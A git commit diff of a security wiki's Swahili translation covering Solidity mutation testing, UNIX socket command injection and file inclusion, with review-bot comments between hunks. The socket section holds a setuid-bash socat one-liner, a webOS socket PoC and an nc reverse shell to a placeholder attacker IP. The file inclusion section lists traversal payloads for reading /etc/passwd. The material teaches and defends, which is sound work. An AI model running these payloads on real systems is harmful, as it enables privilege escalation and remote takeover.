Translated ['', 'src/linux-hardening/privilege-escalation/socket-command

This commit is contained in:
Translator 2025-10-01 09:28:28 +00:00
parent 138a8c016a
commit 068ed2294f
3 changed files with 254 additions and 215 deletions

View File

@ -1,14 +1,14 @@
# Mutation Testing for Solidity with Slither (slither-mutate)
{{#include ../../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
Mutation testing "tests your tests" kwa kuingiza mabadiliko madogo (mutants) kwa njia ya kimfumo katika msimbo wako wa Solidity na kuendesha tena test suite yako. Ikiwa test itashindwa, mutant anaangamizwa. Ikiwa tests bado zinafaulu, mutant ataishi, ikifunua doa la giza kwenye test suite yako ambalo line/branch coverage haiwezi kugundua.
Mutation testing "tests your tests" kwa kuingiza mabadiliko madogo (mutants) kwa mfumo katika code yako ya Solidity na kuendesha tena test suite yako. Ikiwa test itashindwa, mutant anaangamizwa. Ikiwa tests bado zinafaulu, mutant huishi, ikifichua pengo la upofu katika test suite yako ambalo line/branch coverage haiwezi kugundua.
Wazo kuu: Coverage inaonyesha msimbo uliendeshwa; mutation testing inaonyesha kama tabia imethibitishwa kwa kweli.
Wazo muhimu: Coverage inaonyesha code ilitekelezwa; mutation testing inaonyesha ikiwa tabia kwa kweli imethibitishwa.
## Kwa nini coverage inaweza kudanganya
Fikiria ukaguzi huu rahisi wa kizingiti:
Fikiria ukaguzi huu rahisi wa kikomo:
```solidity
function verifyMinimumDeposit(uint256 deposit) public returns (bool) {
if (deposit >= 1 ether) {
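Review bot: the banner include moves from `{{#include ../../../banners/hacktricks-training.md}}` to `{{#include ../../banners/hacktricks-training.md}}`; that only resolves if the translated file now sits two directories below `src/` instead of three, so confirm the file really was relocated rather than the path edited in isolation (the closing include at the end of the file changes the same way, which is at least consistent). On the prose, `pengo la upofu` is the better rendering of "blind spot" than `doa la giza`, but the same line switches from `msimbo wako wa Solidity` to `code yako ya Solidity` while `msimbo` is still used elsewhere on the page; pick one term.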
@ -18,99 +18,99 @@ return false;
}
}
```
Majaribio ya kitengo yanayochunguza tu thamani chini ya na thamani juu ya kikomo yanaweza kufikia 100% ya coverage ya mistari/matawi wakati yakishindwa kuthibitisha ukomo wa usawa (==). Urekebishaji kuwa `deposit >= 2 ether` bado ungefanya majaribio hayo yapite, ukivunja kimya kimya mantiki ya protocol.
Unit tests ambazo zinachek tu thamani chini na thamani juu ya kizingiti zinaweza kufikia 100% line/branch coverage huku zikishindwa kuthibitisha mpaka wa usawa (==). Refactor kuwa `deposit >= 2 ether` bado ingepita mitihani hiyo, ikivunja mantiki ya protocol bila kuonekana.
Mutation testing inaonyesha pengo hili kwa kubadilisha sharti na kuthibitisha majaribio yako yanashindwa.
Mutation testing inaonyesha pengo hili kwa kubadilisha condition na kuthibitisha kwamba mitihani yako inashindwa.
## Vigezo vya mutation vya kawaida katika Solidity
## Operator za mutation za kawaida za Solidity
Slithers mutation engine inatekeleza mabadiliko madogo mengi yanayobadilisha semantiki, kama vile:
- Ubadilishaji wa operator: `+``-`, `*``/`, etc.
- Ubadilishaji wa assignment: `+=``=`, `-=``=`
- Ubadilishaji wa constant: non-zero → `0`, `true``false`
- Kukatizwa/kubadilishwa kwa masharti ndani ya `if`/loops
- Kufanya mistari yote kuwa maoni (CR: Comment Replacement)
- Badilisha mstari kwa `revert()`
- Ubadilishaji wa aina za data: mfano, `int128``int64`
Slithers mutation engine inatumia mabadiliko madogo mengi yanayobadilisha semantiki, kama:
- Operator replacement: `+``-`, `*``/`, etc.
- Assignment replacement: `+=``=`, `-=``=`
- Constant replacement: non-zero → `0`, `true``false`
- Condition negation/replacement inside `if`/loops
- Comment out whole lines (CR: Comment Replacement)
- Replace a line with `revert()`
- Data type swaps: e.g., `int128``int64`
Lengo: Uangamize 100% ya mutants waliotengenezwa, au fafanua wale wanaoishi kwa sababu zilizo wazi.
Lengo: Ua 100% ya mutants waliotengenezwa, au toa sababu za wazi kwa wale wanaobaki.
## Kutumia mutation testing na slither-mutate
## Kuendesha mutation testing na slither-mutate
Mahitaji: Slither v0.10.2+.
- Orodhesha chaguzi na mutators:
- List options and mutators:
```bash
slither-mutate --help
slither-mutate --list-mutators
```
- Mfano wa Foundry (rekodi matokeo na uhifadhi log kamili):
- Mfano wa Foundry (rekodi matokeo na uhifadhi logi kamili):
```bash
slither-mutate ./src/contracts --test-cmd="forge test" &> >(tee mutation.results)
```
- Ikiwa hautumii Foundry, badilisha `--test-cmd` na amri unayotumia kuendesha majaribio (mfano, `npx hardhat test`, `npm test`).
- Ikiwa hutoitumia Foundry, badilisha `--test-cmd` na jinsi unavyotekeleza majaribio (kwa mfano, `npx hardhat test`, `npm test`).
Mafaili ya matokeo (artifacts) na ripoti zinahifadhiwa katika `./mutation_campaign` kwa chaguo-msingi. Mutants wasiokamatwa (waliobaki) wanakiliwa huko kwa uchunguzi.
Artifacts na ripoti huhifadhiwa katika `./mutation_campaign` kwa chaguo-msingi. Mutants zisizogunduliwa (zilizo hai) zinakopishwa huko kwa uchunguzi.
### Understanding the output
### Kuelewa matokeo
Mistari ya ripoti yanaonekana kama:
Mistari ya ripoti zinaonekana kama:
```text
INFO:Slither-Mutate:Mutating contract ContractName
INFO:Slither-Mutate:[CR] Line 123: 'original line' ==> '//original line' --> UNCAUGHT
```
- The tag in brackets is the mutator alias (e.g., `CR` = Comment Replacement).
- `UNCAUGHT` means tests passed under the mutated behavior → missing assertion.
- Tagi ndani ya mabano ni jina fupi la mutator (kwa mfano, `CR` = Comment Replacement).
- `UNCAUGHT` ina maana majaribio yalipita chini ya tabia iliyobadilishwa → ukosefu wa uthibitisho.
## Kupunguza wakati wa utekelezaji: ipa kipaumbele mutants zenye athari kubwa
## Kupunguza muda wa utekelezaji: weka kipaumbele mutanti zenye athari
Mutation campaigns can take hours or days. Tips to reduce cost:
- Scope: Start with critical contracts/directories only, then expand.
- Prioritize mutators: If a high-priority mutant on a line survives (e.g., entire line commented), you can skip lower-priority variants for that line.
- Parallelize tests if your runner allows it; cache dependencies/builds.
- Fail-fast: stop early when a change clearly demonstrates an assertion gap.
Kampeni za mutation zinaweza kuchukua masaa au siku. Vidokezo vya kupunguza gharama:
- Scope: Anza na mikataba/direktori muhimu tu, kisha panua.
- Prioritize mutators: Ikiwa mutanti wa kipaumbele juu kwenye mstari anakaa (kwa mfano, mstari mzima umekomentiwa), unaweza kupuuza tofauti zenye kipaumbele cha chini kwa mstari huo.
- Endesha majaribio kwa usawa ikiwa runner yako inaruhusu; tumia cache kwa dependencies/builds.
- Fail-fast: simama mapema wakati mabadiliko yanaonyesha wazi ukosefu wa uthibitisho.
## Triage workflow for surviving mutants
## Mtiririko wa kazi wa triage kwa mutanti waliobaki
1) Inspect the mutated line and behavior.
- Reproduce locally by applying the mutated line and running a focused test.
1) Angalia mstari uliobadilishwa na tabia yake.
- Rudia ndani ya mazingira ya ndani kwa kuingiza mstari uliobadilishwa na kuendesha test iliyojikita.
2) Strengthen tests to assert state, not only return values.
- Add equality-boundary checks (e.g., test threshold `==`).
- Assert post-conditions: balances, total supply, authorization effects, and emitted events.
2) Imarisha majaribio ili yathibishe hali, si tu thamani zinazorejeshwa.
- Ongeza ukaguzi wa mipaka ya usawa (kwa mfano, test threshold `==`).
- Thibitisha masharti ya baada: salio, total supply, athari za idhini, na matukio yaliyotolewa.
3) Replace overly permissive mocks with realistic behavior.
- Ensure mocks enforce transfers, failure paths, and event emissions that occur on-chain.
3) Badilisha mocks zilizoruhusu mno kwa tabia halisi.
- Hakikisha mocks zinafanya enforced transfers, njia za kushindwa, na utoaji wa matukio yanayotokea on-chain.
4) Add invariants for fuzz tests.
- E.g., conservation of value, non-negative balances, authorization invariants, monotonic supply where applicable.
4) Ongeza invariants kwa fuzz tests.
- Kwa mfano, uhifadhi wa thamani, salio zisizo hasi, invariants za idhini, supply monotonic pale inapofaa.
5) Re-run slither-mutate until survivors are killed or explicitly justified.
5) Rerun slither-mutate hadi mutanti waliobaki waondolewe au wathibitishwe wazi.
## Case study: revealing missing state assertions (Arkis protocol)
## Utafiti wa kesi: kufichua ukosefu wa uthibitisho wa hali (Arkis protocol)
A mutation campaign during an audit of the Arkis DeFi protocol surfaced survivors like:
Kampeni ya mutation wakati wa ukaguzi wa protokoli ya Arkis DeFi ilibaini mutanti waliobaki kama:
```text
INFO:Slither-Mutate:[CR] Line 33: 'cmdsToExecute.last().value = _cmd.value' ==> '//cmdsToExecute.last().value = _cmd.value' --> UNCAUGHT
```
Kuongeza maoni (commenting out the assignment) hakukuangusha tests, ikithibitisha ukosefu wa post-state assertions. Sababu ya mzizi: code iliamini `_cmd.value` iliyo chini ya udhibiti wa mtumiaji badala ya kuthibitisha uhamisho halisi wa tokeni. Mshambulizi angeweza kusababisha uhamisho uliotarajiwa kutofautiana na uhamisho halisi ili kumwaga fedha. Matokeo: hatari ya kiwango cha juu kwa uthabiti wa kifedha wa protocol.
Ku-comment out ugawaji hakukuvunja majaribio, ikathibitisha kukosekana kwa post-state assertions. Sababu ya msingi: msimbo uliamini `_cmd.value` inayoendeshwa na mtumiaji badala ya kuthibitisha uhamisho halisi wa tokeni. Mvamizi angeweza kusababisha kutolingana kati ya uhamisho uliotarajiwa na uhalisi ili kuchoma/mkamua fedha. Matokeo: hatari ya kiwango cha juu kwa uendelevu wa protocol.
Mwongozo: Tibu survivors zinazogusa uhamisho wa thamani, uhasibu, au udhibiti wa upatikanaji kama hatari ya juu hadi zitakaposuluhishwa (killed).
Miongozo: Chukulia mabaki yanayoathiri uhamisho wa thamani, uhasibu, au udhibiti wa upatikanaji kama hatari kubwa hadi yatakaposhindwa/kufutwa.
## Orodha ya vitendo
- Endesha kampeni iliyolengwa:
- `slither-mutate ./src/contracts --test-cmd="forge test"`
- Fanya triage ya survivors na andika tests/invariants ambazo zingeanguka chini ya tabia iliyobadilishwa.
- Thibitisha salio, usambazaji, idhini, na matukio.
- Ongeza tests za mipaka (`==`, overflows/underflows, zero-address, zero-amount, empty arrays).
- Badilisha mocks zisizo za kweli; simulate failure modes.
- Rudia hadi mutants zote ziwe killed au zifafanuliwe kwa maoni na mantiki.
- Fanyia triage mabaki na andika tests/invariants zitakazoshindwa chini ya tabia iliyobadilishwa.
- Thibitisha salio, ugavi, idhini, na matukio.
- Ongeza mtihani wa mipaka (`==`, overflows/underflows, zero-address, zero-amount, empty arrays).
- Badilisha mocks zisizo halisi;iga njia za kushindwa.
- Rudia hadi mutants zote zimeshindikana/kufutwa (killed) au zimefafanuliwa kwa maoni na mantiki.
## References
## Marejeo
- [Use mutation testing to find the bugs your tests don't catch (Trail of Bits)](https://blog.trailofbits.com/2025/09/18/use-mutation-testing-to-find-the-bugs-your-tests-dont-catch/)
- [Arkis DeFi Prime Brokerage Security Review (Appendix C)](https://github.com/trailofbits/publications/blob/master/reviews/2024-12-arkis-defi-prime-brokerage-securityreview.pdf)
- [Slither (GitHub)](https://github.com/crytic/slither)
{{#include ../../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
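Review bot: this hunk regresses lines that were already Swahili back to English: `- Orodhesha chaguzi na mutators:` becomes `- List options and mutators:`, and the mutation-operator bullets (`- Operator replacement: ...`, `- Comment out whole lines (CR: Comment Replacement)`, `- Replace a line with revert()`) lose their Swahili wording, while later in the same hunk the direction is the opposite (`### Understanding the output` → `### Kuelewa matokeo`, the English triage steps → Swahili). Settle on one convention, presumably Swahili prose with the English identifiers kept in backticks. Two smaller points: in the Arkis case study `ili kuchoma/mkamua fedha` is not idiomatic and shifts the meaning ("burn/squeeze"); the replaced `kumwaga fedha` ("drain funds") matched the source, so keep it. And `Badilisha mocks zisizo halisi;iga njia za kushindwa.` is missing the space after the semicolon.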

View File

@ -1,8 +1,10 @@
# Socket Command Injection
{{#include ../../banners/hacktricks-training.md}}
## Mfano wa kuunganisha socket kwa Python
## Mfano wa Socket binding na Python
Katika mfano ufuatao, **socket ya unix inaundwa** (`/tmp/socket_test.s`) na kila kitu **kilichopokelewa** kitakuwa **kinatekelezwa** na `os.system`. Najua huenda usikute hii katika mazingira halisi, lakini lengo la mfano huu ni kuona jinsi msimbo unaotumia socket za unix unavyoonekana, na jinsi ya kudhibiti ingizo katika hali mbaya zaidi.
Katika mfano ufuatao **unix socket imeundwa** (`/tmp/socket_test.s`) na kila kitu **kinachopokelewa** kitatekelezwa na `os.system`. Najua hautakutana na hili kwa urahisi katika mazingira halisi, lakini lengo la mfano huu ni kuona jinsi code inayotumia unix sockets inavyoonekana, na jinsi ya kudhibiti input katika hali mbaya kabisa inayowezekana.
```python:s.py
import socket
import os, os.path
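Review bot: the intro paragraph should state the trust boundary, not only that the example is unrealistic: the socket is created under world-accessible `/tmp` and every datagram is handed straight to `os.system`, so any local user who can connect to `/tmp/socket_test.s` runs commands as whichever account started `s.py`. One sentence to that effect after `... jinsi ya kudhibiti input katika hali mbaya kabisa inayowezekana.` makes the privilege-escalation angle explicit. Also `## Mfano wa Socket binding na Python` reads as "binding together with Python"; `kwa Python`, as in the replaced heading, is the natural preposition here.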
@ -24,15 +26,50 @@ print(datagram)
os.system(datagram)
conn.close()
```
**Teza** msimbo ukitumia python: `python s.py` na **angalia jinsi socket inavyosikiliza**:
**Tekeleza** msimbo kwa kutumia python: `python s.py` na **angalia jinsi socket inavyosikiliza**:
```python
netstat -a -p --unix | grep "socket_test"
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
unix 2 [ ACC ] STREAM LISTENING 901181 132748/python /tmp/socket_test.s
```
**Kuvunja**
**Exploit**
```python
echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/socket_test.s
```
## Uchambuzi wa kesi: Root-owned UNIX socket signal-triggered escalation (LG webOS)
Baadhi ya privileged daemons hutoa root-owned UNIX socket inayokubali untrusted input na kuunganisha vitendo vya privileged na thread-IDs na signals. Ikiwa protocol inaruhusu unprivileged client kuathiri ni native thread gani inalengwa, unaweza kuweza kusababisha privileged code path na escalate.
Mfano ulioshuhudiwa:
- Unganisha kwenye root-owned socket (mfano, /tmp/remotelogger).
- Tengeneza thread na upate native thread id (TID).
- Tuma TID (packed) pamoja na padding kama request; upokee acknowledgement.
- Toa signal maalum kwa TID hiyo ili ku-trigger privileged behaviour.
Muhtasari mdogo wa PoC:
```python
import socket, struct, os, threading, time
# Spawn a thread so we have a TID we can signal
th = threading.Thread(target=time.sleep, args=(600,)); th.start()
tid = th.native_id # Python >=3.8
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect("/tmp/remotelogger")
s.sendall(struct.pack('<L', tid) + b'A'*0x80)
s.recv(4) # sync
os.kill(tid, 4) # deliver SIGILL (example from the case)
```
Ili kuibadilisha kuwa root shell, muundo rahisi wa named-pipe + nc unaweza kutumika:
```bash
rm -f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc <ATTACKER-IP> 23231 > /tmp/f
```
Vidokezo:
- Aina hii ya mdudu hutokea kutokana na kuamini thamani zinazotokana na hali ya mteja isiyo na mamlaka (TIDs) na kuziunganisha kwa signal handlers au mantiki zenye ruhusa.
- Imarisha kwa kusisitiza maelezo ya uthibitisho kwenye socket, kuthibitisha muundo wa ujumbe, na kutenganisha operesheni zenye ruhusa kutoka kwa vitambulisho vya thread vinavyotolewa kutoka nje.
## Marejeleo
- [LG WebOS TV Path Traversal, Authentication Bypass and Full Device Takeover (SSD Disclosure)](https://ssd-disclosure.com/lg-webos-tv-path-traversal-authentication-bypass-and-full-device-takeover/)
{{#include ../../banners/hacktricks-training.md}}
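Review bot: the fences after **Tekeleza** and **Exploit** are tagged `python` but hold a `netstat` transcript and a `socat` one-liner; tag them `bash` (or `text` for the netstat output) so nobody tries to run them as Python. In the webOS PoC, `os.kill(tid, 4)  # deliver SIGILL (example from the case)` hides two things a reader needs: `4` should be written `signal.SIGILL`, and on Linux `os.kill` is `kill(2)`, which takes a PID, so passing a TID delivers the signal to the whole thread group, not to that one thread; if the trigger has to land on the spawned thread specifically, `signal.pthread_kill(th.ident, signal.SIGILL)` does that. Either way SIGILL's default action terminates the sending process, so a comment should say whether a handler is expected or whether the crash itself is the intended trigger. Minor: `s.recv(4)  # sync` discards the acknowledgement; if its value matters to the protocol, check it before signalling.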

View File

@ -4,14 +4,14 @@
## File Inclusion
**Remote File Inclusion (RFI):** Faili inasomwa kutoka kwa server ya mbali (Bora: Unaweza kuandika msimbo na server itauitekeleza). Katika php hii ni **imezimwa** kwa default (**allow_url_include**).\
**Local File Inclusion (LFI):** Server inapakia faili ya ndani.
Remote File Inclusion (RFI): Faili inapatikana kutoka kwenye server ya mbali (Bora: Unaweza kuandika code na server itaiendesha). Katika php hii imezimwa kwa default (allow_url_include).\
Local File Inclusion (LFI): Server inapakia faili ya ndani.
Udhaifu hutokea wakati mtumiaji anaweza kwa njia fulani kudhibiti faili itakayopakiwa na server.
Udhaifu hutokea wakati mtumiaji anaweza kwa namna fulani kudhibiti faili ambayo server itakuwa inapakia.
Zilizo hatarini **PHP functions**: require, require_once, include, include_once
Vulnerable PHP functions: require, require_once, include, include_once
Chombo kizuri cha ku-exploit udhaifu huu: [https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
Chombo kizuri cha kutumia kufaida udhaifu huu: [https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
## Blind - Interesting - LFI2RCE files
```python
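Review bot: the rewritten RFI/LFI definitions drop the markdown emphasis the replaced lines had (`**Remote File Inclusion (RFI):**`, `**imezimwa**`, `**allow_url_include**`, and `**PHP functions**`), so the rendered page loses its bolded terms for no translation reason; restore the `**...**` around the same spans. Also the fence following `## Blind - Interesting - LFI2RCE files` is tagged `python` for a `wfuzz` command line; `bash` is the right tag.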
@ -19,17 +19,17 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
```
### **Linux**
**Nimechanganya orodha kadhaa za \*nix LFI na kuongeza njia zaidi, nimeunda hii:**
**Nimetengeneza hii kwa kuchanganya orodha kadhaa za *nix LFI na kuongeza njia zaidi:**
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt
{{#endref}}
Pia jaribu kubadilisha `/` kwa `\`\
Pia jaribu kuongeza `../../../../../`
Jaribu pia kubadilisha `/` kwa `\`\
Jaribu pia kuongeza `../../../../../`
Orodha inayotumia mbinu mbalimbali kupata faili /etc/password (kuangalia kama udhaifu upo) inaweza kupatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)
Orodha inayotumia mbinu kadhaa kutafuta faili /etc/password (kuangalia kama udhaifu upo) inaweza kupatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)
### **Windows**
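Review bot: the new line `**Nimetengeneza hii kwa kuchanganya orodha kadhaa za *nix LFI na kuongeza njia zaidi:**` drops the backslash from `\*nix`; an unescaped `*` inside a bold span can open an emphasis run in markdown and break the rendering of the rest of the sentence, so keep `\*nix`. Separate from the translation: both the old and the new line say `/etc/password`; the file the linked wordlist probes for is `/etc/passwd`, as used everywhere else on the page.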
@ -40,22 +40,22 @@ Muungano wa wordlists tofauti:
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
{{#endref}}
Pia jaribu kubadilisha `/` kwa `\`\
Pia jaribu kuondoa `C:/` na kuongeza `../../../../../`
Jaribu pia kubadilisha `/` kwa `\`\
Jaribu pia kuondoa `C:/` na kuongeza `../../../../../`
Orodha inayotumia mbinu mbalimbali kupata faili /boot.ini (kuangalia kama udhaifu upo) inaweza kupatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)
Orodha inayotumia mbinu kadhaa kutafuta faili /boot.ini (kuangalia kama udhaifu upo) inaweza kupatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)
### **OS X**
Kagua orodha ya LFI ya linux.
Angalia orodha ya LFI ya Linux.
## Misingi ya LFI na bypasses
## Basic LFI and bypasses
Mifano yote ni kwa Local File Inclusion lakini pia inaweza kutumika kwa Remote File Inclusion (page=[http://myserver.com/phpshellcode.txt\\](<http://myserver.com/phpshellcode.txt)/>).
Mifano yote ni kwa Local File Inclusion lakini inaweza kutumika pia kwa Remote File Inclusion (page=[http://myserver.com/phpshellcode.txt\\](<http://myserver.com/phpshellcode.txt)//>).
```
http://example.com/index.php?page=../../../etc/passwd
```
### traversal sequences zilizokatwa bila kurudi kwa msururu
### traversal sequences zimeondolewa bila kutumia rekursia
```python
http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
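Review bot: `## Misingi ya LFI na bypasses` is replaced by the English `## Basic LFI and bypasses`, which reverts a translated heading; keep the Swahili one. In the paragraph below it the RFI link was already malformed (`[http://myserver.com/phpshellcode.txt\\](<http://myserver.com/phpshellcode.txt)/>)`) and the new line adds a second slash (`...txt)//>)`) instead of fixing it; the intended text is simply `page=http://myserver.com/phpshellcode.txt`.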
@ -63,59 +63,59 @@ http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
```
### **Null byte (%00)**
Bypass kuongezwa kwa chars mwishoni mwa string iliyotolewa (bypass of: $\_GET\['param']."php")
Bypass kuongeza herufi zaidi mwishoni mwa mfuatano wa herufi uliotolewa (bypass ya: $\_GET\['param']."php")
```
http://example.com/index.php?page=../../../etc/passwd%00
```
Hii **imetatuliwa tangu PHP 5.4**
### **Kodishaji**
### **Encoding**
Unaweza kutumia kodishaji zisizo za kawaida kama double URL encode (na nyingine):
Unaweza kutumia encodings zisizo za kawaida kama double URL encode (na zingine):
```
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```
### Kutoka kwenye folda iliyopo
### Kutoka kwenye folder iliyopo
Labda back-end inakagua njia ya folda:
Labda back-end inakagua folder path:
```python
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
```
### Kuchunguza Saraka za Mfumo wa Faili kwenye Server
### Kuchunguza Saraka za Mfumo wa Faili kwenye Seva
Mfumo wa faili wa server unaweza kuchunguzwa kwa njia ya kurudia ili kubaini saraka, sio tu faili, kwa kutumia mbinu fulani. Mchakato huu unahusisha kubaini kina cha saraka na kuchunguza kuwepo kwa folda maalum. Hapa chini kuna njia ya kina ya kufanikisha hili:
Mfumo wa faili wa seva unaweza kuchunguzwa kwa kurudia (recursively) ili kubaini saraka, si faili tu, kwa kutumia mbinu fulani. Mchakato huu unahusisha kuamua kina cha saraka na kujaribu uwepo wa mafolda maalum. Hapo chini kuna njia ya kina ya kufanikisha hili:
1. **Determine Directory Depth:** Tambua kina cha saraka yako ya sasa kwa kupata kwa mafanikio faili ya `/etc/passwd` (inatumika ikiwa server ni Linux-based). Mfano wa URL unaweza kuundwa kama ifuatavyo, ukiashiria kina cha tatu:
1. **Tambua Kina cha Saraka:** Tambua kina cha saraka yako ya sasa kwa kupata kwa mafanikio faili `/etc/passwd` (inapotumika ikiwa seva inategemea Linux). URL mfano inaweza kuundwa kama ifuatavyo, ikiashiria kina cha tatu:
```bash
http://example.com/index.php?page=../../../etc/passwd # depth of 3
```
2. **Probe for Folders:** Ongeza jina la folda inayoshukiwa (kwa mfano, `private`) kwenye URL, kisha rudi kwa `/etc/passwd`. Ngazi ya directory ya ziada inahitaji kuongeza depth kwa moja:
2. **Probe for Folders:** Ongeza jina la folda inayoshukiwa (kwa mfano, `private`) kwenye URL, kisha rudi `/etc/passwd`. Kiwango cha ziada cha saraka kinahitaji kuongeza depth kwa moja:
```bash
http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4
```
3. **Tafsiri Matokeo:** Jibu la server linaonyesha kama folda ipo:
- **Error / No Output:** Inawezekana folda `private` haipo mahali ulioletwa.
- **Contents of `/etc/passwd`:** Uwepo wa folda `private` umethibitishwa.
4. **Uchunguzi Rekursivu:** Folda zilizogunduliwa zinaweza kuchunguzwa zaidi kwa folda ndogo au faili kwa kutumia mbinu ile ile au mbinu za kawaida za Local File Inclusion (LFI).
3. **Tafsiri Matokeo:** Jibu la server linaonyesha ikiwa folda ipo:
- **Hitilafu / Hakuna Matokeo:** Folda `private` huenda haipo katika eneo lililotajwa.
- **Maudhui ya `/etc/passwd`:** Upo wa folda `private` umethibitishwa.
4. **Uchunguzi Rekursivu:** Folda zilizogunduliwa zinaweza kuchunguzwa zaidi kwa ajili ya subdirectories au faili kwa kutumia mbinu ile ile au mbinu za jadi za Local File Inclusion (LFI).
Kwa kuchunguza folda katika maeneo tofauti ya mfumo wa faili, rekebisha payload ipasavyo. Kwa mfano, ili kuangalia kama `/var/www/` ina folda `private` (ikiwa current directory iko kwa kina cha 3), tumia:
Kwa kuchunguza folda katika maeneo tofauti ya mfumo wa faili, rekebisha payload ipasavyo. Kwa mfano, ili kuangalia kama `/var/www/` ina folda `private` (kwa kuzingatia folda ya sasa iko kwa kina cha 3), tumia:
```bash
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
```
### **Path Truncation Technique**
Path truncation ni mbinu inayotumiwa kubadilisha njia za faili katika maombi ya wavuti. Mara nyingi hutumika kufikia faili zilizozuiliwa kwa kuruka hatua fulani za usalama ambazo zinaongeza alama za ziada mwishoni mwa njia za faili. Lengo ni kuunda njia ya faili ambayo, mara itakapo badilishwa na hatua ya usalama, bado itaelekeza kwenye faili inayotakiwa.
Path truncation ni mbinu inayotumika kubadilisha file paths katika web applications. Mara nyingi hutumika kupata files zilizofungiwa kwa kuruka baadhi ya hatua za usalama zinazoongeza herufi za ziada mwishoni mwa file paths. Lengo ni kuunda file path ambayo, mara itakapobadilishwa na hatua ya usalama, bado itaonyesha file inayotakiwa.
Katika PHP, uwakilishi mbalimbali wa njia ya faili unaweza kuzingatiwa sawa kutokana na asili ya mfumo wa faili. Kwa mfano:
In PHP, uwakilishi mbalimbali wa file path unaweza kuchukuliwa kuwa sawa kutokana na tabia ya file system. Kwa mfano:
- `/etc/passwd`, `/etc//passwd`, `/etc/./passwd`, and `/etc/passwd/` zote zinachukuliwa kuwa njia moja.
- Wakati herufi 6 za mwisho ni `passwd`, kuongezea a `/` (kufanya `passwd/`) hakubadilishi faili inayolengwa.
- Vivyo vivyo, ikiwa `.php` inaongezwa kwenye njia ya faili (kwa mfano `shellcode.php`), kuongeza `/.` mwishoni haitabadilishi faili inayofikiwa.
- `/etc/passwd`, `/etc//passwd`, `/etc/./passwd`, and `/etc/passwd/` zote huchukuliwa kuwa path ileile.
- When the last 6 characters are `passwd`, appending a `/` (making it `passwd/`) doesn't change the targeted file.
- Similarly, if `.php` is appended to a file path (like `shellcode.php`), adding a `/.` at the end will not alter the file being accessed.
Mifano iliyopewa inaonyesha jinsi ya kutumia path truncation kufikia `/etc/passwd`, lengo la kawaida kutokana na maudhui yake nyeti (taarifa za akaunti za watumiaji):
Mifano iliyotolewa inaonyesha jinsi ya kutumia path truncation kufikia `/etc/passwd`, lengo la kawaida kutokana na yaliyomo hatarishi (taarifa za akaunti za watumiaji):
```
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
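Review bot: the path-truncation explanation goes backwards: the three Swahili bullets (`- ... zote zinachukuliwa kuwa njia moja.` and the two after it) are replaced by their English originals, and the paragraph introducing them now opens `In PHP, uwakilishi mbalimbali ...`; keep the Swahili bullets and translate the opening words. Terminology also flips between `server` and `seva` inside one hunk (`### Kuchunguza Saraka za Mfumo wa Faili kwenye Seva` vs `Jibu la server ...`); choose one. Unrelated to the translation but worth a follow-up: `Hii **imetatuliwa tangu PHP 5.4**` for the null-byte trick disagrees with the page's own later note that truncation was fixed in PHP 5.3; paths containing a null byte have been rejected since PHP 5.3.4, so that is the accurate version to cite.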
@ -125,17 +125,17 @@ http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
```
Katika matukio haya, idadi ya traversals zinazohitajika inaweza kuwa takriban 2027, lakini nambari hii inaweza kutofautiana kulingana na usanidi wa seva.
Katika senario hizi, idadi ya traversals zinazohitajika inaweza kuwa karibu 2027, lakini namba hii inaweza kutofautiana kulingana na usanidi wa server.
- **Using Dot Segments and Additional Characters**: Mfululizo wa traversal (`../`) ukichanganywa na sehemu za dot za ziada na herufi unaweza kutumika kuvinjari mfumo wa faili, kwa ufanisi kupuuza mnyororo uliowekwa na seva.
- **Determining the Required Number of Traversals**: Kupitia jaribio na makosa, mtu anaweza kupata idadi kamili ya mfululizo wa `../` zinazohitajika kufika kwa directory ya mzizi na kisha kwa `/etc/passwd`, kuhakikisha kwamba nyongeza yoyote iliyowekwa (kama `.php`) inafutwa lakini njia inayotakiwa (`/etc/passwd`) inabaki sawa.
- **Starting with a Fake Directory**: Ni desturi ya kawaida kuanza njia na directory isiyo ya kweli (kama `a/`). Mbinu hii hutumika kama tahadhari au kutimiza mahitaji ya mantiki ya seva ya kuchanganua njia.
- **Using Dot Segments and Additional Characters**: Traversal sequences (`../`) pamoja na dot segments za ziada na characters zinaweza kutumika kuvinjari mfumo wa faili, huku zikifanya server ipuuze nyongeza (kama `.php`) zilizoongezwa.
